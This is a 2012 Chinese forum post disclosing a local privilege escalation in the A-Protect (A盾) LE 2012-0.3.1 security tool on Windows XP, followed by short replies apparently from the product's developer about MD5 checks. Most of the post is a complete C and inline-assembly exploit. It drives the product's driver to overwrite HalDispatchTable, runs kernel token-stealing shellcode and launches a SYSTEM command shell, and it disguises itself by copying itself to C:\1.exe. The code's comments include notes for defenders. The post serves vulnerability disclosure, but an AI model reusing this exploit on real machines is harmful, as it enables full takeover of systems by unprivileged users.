[原创]A盾电脑防护 LE 2012-0.3.1 的一个XXX (还是本地提权)
发表于: 2012-6-19 15:56 5697

环境:Windows XP SP3 虚拟机

1.打开A-Protect.exe
2.等待A-Protect.exe显示完系统进程信息
3.编译如下代码,双击运行后结束A-Protect.exe,然后得到一个SYSTEM的CMD

#include <Windows.h>
 
// One entry of the undocumented module list returned by
// NtQuerySystemInformation(SystemModuleInformation). This is the 32-bit
// layout (WinMain casts the pointers to ULONG, so the code is x86-only).
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;                 // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;                // kernel-mode load address; WinMain takes Modules[0].ImageBase as the ntoskrnl base
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;        // byte offset of the bare file name inside FullPathName
    UCHAR  FullPathName[ 256 ];     // treated as an ANSI string by WinMain (passed to LoadLibraryA)
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
 
// Header of the SystemModuleInformation buffer. Modules[1] is really a
// variable-length array, so a buffer of sizeof(RTL_PROCESS_MODULES) holds
// only the first entry; WinMain deliberately passes such a buffer, expects
// STATUS_INFO_LENGTH_MISMATCH back, and still reads Modules[0] (the code
// assumes the kernel image is listed first).
typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
 
// Native API prototypes, resolved from ntdll at run time in WinMain instead of
// linking against ntdll.lib. NtAllocateVirtualMemory is resolved but never
// called anywhere in this listing (VirtualAlloc is used instead).
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
 
// State shared between WinMain and ShellCode. ShellCode reaches these with
// `offset ...` / direct memory operands, so they must be file-scope objects
// with fixed addresses.
ULONG  WriteToHalDispatchTable, ZwOpenProcess, ZwOpenProcessTokenEx, ZwDuplicateToken, ZwSetInformationProcess;   // kernel-mode addresses, computed in WinMain
ULONG  SYSTEMCID[2]={4,0}, ObjectAttributes[6];   // presumably a CLIENT_ID {UniqueProcess=4 (the System process on XP), UniqueThread=0} and an all-zero 24-byte OBJECT_ATTRIBUTES -- inferred from the names
HANDLE  hSystemProc, hTokenHandle, hNewTokenHandle;   // outputs of the three Zw* calls in ShellCode; never closed
 
// Kernel-mode payload. WinMain copies the first 200 bytes of this routine into
// an RWX user-mode page, has the protection driver store that page's address
// at HalDispatchTable+4, and then calls NtQueryIntervalProfile, which on the
// XP target presumably dispatches through that table slot. Running with
// kernel privileges, the code below opens the System process (SYSTEMCID),
// duplicates its token and installs the duplicate as the primary token of the
// current process, calling the Zw* routines through the kernel addresses
// WinMain stored in the globals above. Declared naked so the function body is
// exactly the instructions written here (MSVC x86 inline assembly; not portable).
// Defender's note: nothing in this routine is product-specific; the product's
// only contribution is letting a user-mode caller choose a kernel write
// destination. The driver-side fix is to never honour a user-supplied kernel
// address, and the user-mode prelude (ntoskrnl.exe loaded into an ordinary
// process, an RWX allocation, NtQueryIntervalProfile right after) is a
// recognisable pattern for host monitoring.
void _declspec(naked) ShellCode()
{
    __asm
    {
            pushad                          // preserve every register and the flags:
            pushfd                          // this runs inside someone else's kernel call path
 
            // ZwOpenProcess(&hSystemProc, 0x0400, &ObjectAttributes, &SYSTEMCID)
            // stdcall, so arguments are pushed right to left; 0x0400 is PROCESS_QUERY_INFORMATION.
            push offset SYSTEMCID
            push offset ObjectAttributes
            push 0x0400
            push offset hSystemProc
            call ZwOpenProcess              // indirect through the global holding the kernel address
            cmp eax,0                       // anything but STATUS_SUCCESS: bail out, no cleanup of what was opened
            jnz exit0
 
            // ZwOpenProcessTokenEx(hSystemProc, TOKEN_ALL_ACCESS, 0x200, &hTokenHandle)
            // 0x200 is OBJ_KERNEL_HANDLE.
            push offset hTokenHandle
            push 0x200
            push TOKEN_ALL_ACCESS
            push hSystemProc;
            call ZwOpenProcessTokenEx
            cmp eax,0
            jnz exit0
 
            // ZwDuplicateToken(hTokenHandle, TOKEN_ALL_ACCESS, NULL, FALSE, TokenPrimary, &hNewTokenHandle)
            push offset hNewTokenHandle
            push TokenPrimary
            push 0
            push 0
            push TOKEN_ALL_ACCESS
            push hTokenHandle
            call ZwDuplicateToken
            cmp eax,0
            jnz exit0
 
            // ZwSetInformationProcess(NtCurrentProcess() /* -1 */, ProcessAccessToken /* 9 */, &hNewTokenHandle, 8)
            // The 8-byte PROCESS_ACCESS_TOKEN {Token, Thread} is read starting at
            // hNewTokenHandle; its Thread member is whatever the linker placed after
            // that global (assumed to be zero/ignored -- unverified).
            push 8
            push offset hNewTokenHandle
            push 9
            push 0xFFFFFFFF
            call ZwSetInformationProcess    // result deliberately not checked
exit0:
            popfd
            popad
 
            ret                             // returns without popping any arguments the hijacked table entry would normally receive (unverified)
    }
}
 
#define AProcess_Size 0x683800           // size of the file written to C:\1.exe; presumably the size of the genuine A-Protect.exe so the copy passes a size check in the driver (the replies discuss size/MD5 checks) -- unverified
WCHAR   pSelfEXEPath[MAX_PATH];         // this executable's own path (parent role)
UCHAR   pBuffer[AProcess_Size];         // static staging buffer: own image followed by zero padding up to AProcess_Size
char    pSafe[] = "Safe";               // 5-byte array handed to the driver's ReadFile channel with a length of 8; meaning of the token unverified
 
// Entry point; the executable plays two roles chosen by its command line.
//   * Parent (no argument, i.e. the user double-clicked it): the else-branch.
//     Closes the A盾 window, writes a copy of itself padded to AProcess_Size
//     as C:\1.exe and starts that copy with the command line "Son".
//   * Child ("Son"): the if-branch. Locates the kernel image, resolves the
//     kernel addresses ShellCode needs, asks the protection driver (through
//     ReadFile on made-up handle values) to write into HalDispatchTable,
//     fires the payload via NtQueryIntervalProfile and then starts cmd.exe,
//     which inherits this process's replaced token.
// Every failure just returns 0; handles opened before the failure (hSelfFile,
// the CreateProcess handles) are never closed.
// Defender's note: the self-copy to C:\1.exe exists only to look like the
// genuine product to the driver (the replies talk about size and MD5 checks);
// any caller identity that user mode can reproduce is not a security boundary,
// and a driver must not expose a user-controlled kernel write at all. Side
// effects a host monitor can key on: WM_CLOSE posted to the product's window,
// a process copying itself to C:\1.exe, an ordinary user-mode process loading
// ntoskrnl.exe, and cmd.exe started from it with a SYSTEM token.
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
 
    HMODULE ntdll;                                   // unused: shadowed by the declaration inside the if-branch
    ntdll   =   GetModuleHandle( L"ntdll.dll" );
 
    // Child role. The parent passes lpApplicationName separately, so the whole
    // command line is exactly "Son" (compared case-insensitively).
    if (  _stricmp(GetCommandLineA(),"Son") == 0 )
    {
        // Resolve the native routines from ntdll; NtAllocateVirtualMemory is never used below.
        HMODULE  ntdll        =  GetModuleHandle( L"ntdll.dll" );
        NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
        NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
        NtQuerySystemInformation  =  ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
        if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
            return 0;
 
        // Fetch ntoskrnl's entry from the module list; a single call is enough.
        // The buffer holds only one entry, so the call reports
        // STATUS_INFO_LENGTH_MISMATCH; the code relies on Modules[0] having been
        // filled in anyway and assumes the kernel is listed first.
        ULONG  status, NtoskrnlBase;
        RTL_PROCESS_MODULES  module;
        status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
        if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
            return 0;
 
        NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;   // kernel-mode base of ntoskrnl
 
        // Load ntoskrnl.exe into this process as an ordinary DLL (by bare file
        // name, so presumably the loader finds the system32 copy) just to read
        // its export table.
        HMODULE    ntoskrnl;
        ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
        if ( ntoskrnl == NULL )
            return 0;
 
        // Translate user-mode export addresses into kernel addresses:
        // kernel = user - user_base + kernel_base. ShellCode calls through these globals.
        WriteToHalDispatchTable    =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; // the address to overwrite (second slot of the table)
        ZwOpenProcess        =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwOpenProcessTokenEx    =  (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcessTokenEx") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwDuplicateToken      =  (ULONG)GetProcAddress(ntoskrnl,"ZwDuplicateToken") - (ULONG)ntoskrnl + NtoskrnlBase;
        ZwSetInformationProcess    =  (ULONG)GetProcAddress(ntoskrnl,"ZwSetInformationProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
 
        // Original comment: "from here on, everyone has their own tricks" --
        // i.e. the product-specific part. ReadFile on a made-up handle value with
        // "Safe" as the buffer is presumably intercepted by the protection driver
        // as an unlock command; neither the handle values nor the protocol can be
        // verified from this listing. Return value ignored.
        ReadFile((HANDLE)0x18881111,pSafe,8,NULL,NULL);
 
        // RWX page that will receive the payload (MEM_TOP_DOWN presumably to get a high address).
        LPVOID MyAddress = VirtualAlloc(NULL,0x1000,MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
        if (MyAddress==NULL)
            return 0;
        memset(MyAddress,0,0x1000);
 
        // Second driver command, passed as a "length" that is really a pointer
        // to this array. From the order of operations (the page is still all
        // zeros at this point) it appears to be a write-what-where with
        // Length[6] = value and Length[7] = kernel destination; Length[0] = -1
        // is unexplained. Note that Length has 7 elements, so Length[7] is an
        // out-of-bounds store (UB) into whatever the compiler placed after it.
        ULONG Length[7]={0};
        Length[0]=-1;
        Length[6]=(ULONG)MyAddress;
        Length[7]=WriteToHalDispatchTable;
        ReadFile((HANDLE)0x18881191,0,(ULONG)Length,NULL,NULL);
 
        memcpy( MyAddress, ShellCode, 200 );    // assumes ShellCode's code is at most 200 bytes -- unverified
 
        // Trigger (original comment: "trigger, pops a SYSTEM cmd").
        // NtQueryIntervalProfile presumably dispatches through the overwritten
        // HalDispatchTable slot, running ShellCode in kernel mode. `status` is
        // just reused as the required out-parameter.
        NtQueryIntervalProfile( 2, &status );
 
        STARTUPINFO si;
        PROCESS_INFORMATION pii;
 
        ZeroMemory( &si, sizeof(si) );
        si.cb = sizeof(si);
        ZeroMemory( &pii, sizeof(pii) );
 
        // cmd.exe inherits this process's primary token (the System token if
        // ShellCode succeeded). Result unchecked; pii handles never closed.
        CreateProcess( L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
    }
    else
    {
        // Parent role.
        HWND hWnd;
 
        // Close the product's main window, found by its exact (version-specific) title.
        hWnd = FindWindow(NULL,L"A盾电脑防护 LE 2012-0.3.1");
        if ( hWnd == NULL )
            return 0;
        PostMessage(hWnd,WM_CLOSE,0,0);
 
        // Poll for up to 10 s for a window titled "A盾电脑防护" (presumably a
        // close-confirmation prompt -- unverified) and post Enter to it. A bare
        // WM_KEYDOWN is a fragile way to press a button.
        for ( int i = 0; i < 10; i++ )
        {
            Sleep(1000);
 
            hWnd = FindWindow(NULL,L"A盾电脑防护");
            if ( hWnd != NULL )
            {
                PostMessage(hWnd,WM_KEYDOWN,VK_RETURN,0);
                break;
            }
        }
 
        // Read this executable's own image into the static staging buffer.
        GetModuleFileName(NULL,pSelfEXEPath,MAX_PATH);
 
        HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if ( hSelfFile == INVALID_HANDLE_VALUE )
            return 0;
 
        ULONG uFileSize = GetFileSize(hSelfFile,NULL);
        if ( uFileSize == INVALID_FILE_SIZE )
            return 0;                                    // hSelfFile is leaked on this and the following early returns
 
        // No check that uFileSize <= sizeof pBuffer: an image larger than
        // AProcess_Size would overrun the static buffer.
        ULONG dwResult;
        if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
            return 0;
 
        // Write exactly AProcess_Size bytes (image + zero padding) as C:\1.exe,
        // replacing any existing file.
        HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hTargetFile == INVALID_HANDLE_VALUE)
            return 0;
 
        if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
            return 0;
 
        CloseHandle(hSelfFile);
 
        CloseHandle(hTargetFile);
 
 
        STARTUPINFO si;
        PROCESS_INFORMATION pii;
 
        ZeroMemory( &si, sizeof(si) );
        si.cb = sizeof(si);
        ZeroMemory( &pii, sizeof(pii) );
 
        // Start the copy in the child role. lpCommandLine is a string literal,
        // although CreateProcessW is documented as possibly modifying that
        // buffer. Result unchecked; pii handles never closed.
        CreateProcess( L"C:\\1.exe", L"Son", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
    }
    return 0;
}


不玩了,学习A盾开源的代码去了。


最新回复 (4)
2
哈哈,我就知道你会用这招:

HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if ( hSelfFile == INVALID_HANDLE_VALUE )
      return 0;

    ULONG uFileSize = GetFileSize(hSelfFile,NULL);
    if ( uFileSize == INVALID_FILE_SIZE )
      return 0;

    ULONG dwResult;
    if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
      return 0;

    HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hTargetFile == INVALID_HANDLE_VALUE)
      return 0;

    if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
      return 0;

看来我这样做限制还是不行~~看来要验证MD5才行了。
2012-6-19 19:42
3
话说这样应该不是严格意义上的本地提权吧,因为只要A盾还在运行着,是不会产生这个bug~
2012-6-19 19:52
4
呃。。乱用提权字眼了。

验MD5也不管用啊

以后修改的代码还会继续开源么?
2012-6-19 20:12
5
  看情况了。如果觉得发布的意义大于留在硬盘的意义,就发布。
2012-6-20 09:17